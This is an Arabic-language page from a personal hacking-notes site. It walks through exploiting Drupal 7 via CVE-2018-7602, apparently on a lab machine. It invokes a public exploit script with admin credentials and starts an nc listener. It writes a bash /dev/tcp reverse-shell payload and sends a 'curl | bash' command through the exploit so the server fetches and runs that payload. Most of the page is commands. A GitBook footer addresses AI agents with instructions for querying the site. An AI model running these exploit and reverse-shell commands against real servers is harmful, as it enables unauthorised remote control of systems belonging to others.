> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/cms/drupal-cms-exploitation/drupal-7-reverse-shell.md).

# Drupal 7 - شل عكسي

استخدم البرنامج النصي التالي لتنفيذ الأوامر على خادم Drupal 7 المعرض للثغرة CVE-2018-7602:

{% embed url="<https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7602.py>" %}

```bash
python3 drupa7-CVE-2018-7602.py admin PencilKeyboardScanner123 http://10.10.10.102 -c "id" -f "passthru"
```

ينفّذ هذا الأمر `المعرّف` على الخادم.

<figure><img src="/files/496d7c6a41bf0a023058382a165d08ed653d652f" alt=""><figcaption></figcaption></figure>

**الوصول إلى الخادم**/ للحصول على وصول إلى الخادم، ابدأ `nc` مستمعًا على المنفذ 443.

```bash
nc -nvlp 443
```

ثم أنشئ `index.html` ملفًا بالمحتوى التالي للـ reverse shell:

```bash
#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.30/443 0>&1
```

**خادم الويب وتنفيذ الأوامر**/ شغّل خادم Python HTTP:

```bash
python3 -m http.server 80 
```

ثم أرسل الأمر التالي لتنزيل البرنامج النصي وتنفيذه:

```bash
curl http://10.10.14.3 | bash
```

```bash
python3 drupa7-CVE-2018-7602.py admin PencilKeyboardScanner123 http://10.10.10.102 -c "curl http://10.10.14.30 | bash" -f "passthru"
```

<div data-full-width="true"><figure><img src="/files/193aadd1289e437b8c3c78e2cb4c1bf6f035126f" alt=""><figcaption></figcaption></figure></div>

**تثبيت الطرفية**


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/cms/drupal-cms-exploitation/drupal-7-reverse-shell.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
